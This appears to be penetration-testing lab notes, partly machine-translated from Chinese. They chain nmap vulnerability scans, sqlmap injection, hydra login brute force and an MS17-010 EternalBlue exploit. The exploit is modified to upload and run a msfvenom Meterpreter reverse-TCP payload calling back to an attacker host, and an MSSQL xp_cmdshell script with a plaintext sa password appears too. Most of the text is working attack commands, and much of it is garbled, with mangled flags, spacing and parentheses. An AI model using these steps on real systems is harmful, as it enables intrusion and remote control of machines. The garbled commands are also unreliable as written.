nmap-T4-a-ss-SV-vv-- script vuln-p---open-n-pn 10.11.1.31-ox 10.11.1.31.XML
xlt proc-o 10.11.1.31.html 10.11.1.31.XML
sqlmap-u ' http://10.11.1.31/log in-off.ASP '-- data=' txtlog inid=' amdintxtpassword=1cmd submit=log in '---- log in
hydra-luser.txt-ppass.txt-s 8010.11.1.31 http-post-form '/log in-off.ASP 3360 txtlog inid=^ user ^ txt PPPs
git clone https://github.com/worawit/ms17-010 /
光盘桌面/ms17-010 /
python checker.py 10.11.1.5
在netlogon中,状态为OK表示存在漏洞。
MSF venom-p windows/meter preter/reverse _ tcpl host=10.11.0.243 lport=4444-fexe-o/tmp/1.exe
打开元数据打印
useexploit/multi/handler
Show payload
setpayloadwindows/meter preter/reverse _ TCP
setlhost10.11.0.243
setlport4444
导出
jobs请勿关闭msf的控制台
然后返回/MS17-010/文件夹,修改zzz_exploit.py文件中的代码。
leafpadzzz_exploit.py
搜索SMB_PWN(Conn,arch )
注释行: print (creating filec : (pwned.txtonthetarget ) ) )。
TID2=SMBConn.connecttree('c$ ' ) )。
FID2=SMBConn.createfile(tid2,'/pwned.txt ' ) ) ) ) ) ) ) ) )。
SMBConn.closefile(TID2,fid2) )。
SMBConn.disconnecttree(tid2) )。
取消对这几行的注释。 ((盖) ) ) ) )。
SMB_send_file(SMBconn,'/tmp/1.exe ',' c ','/1.exe ' ) )
service_exec(Conn,r'cmd/cc:((1.exe ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) )。
本地kali机器上的1.exe记得打开777权限。 否则,无法连接到靶机。
python zzz _ exploit.py 10.11.1.5 NetLogon (可删除的netlogon ) ) )。
sessions验证是否已建立l会话
sssions-I1(id )链接会话getuidps
如果光盘“ documentsandsettingsadministratordesktop”路径中间有空格,则必须用双引号引起来
cat proof.txt
26 b4cb 0930 a3 e3be 4d a8e 9d 738607427
nmap-p 1433-- script=ms-SQL-XP-cmdshell.NSE-- script-args MSSQL.username=sa,MSSQL.password=poiuyt rewew
然后登录桌面查看proof.txt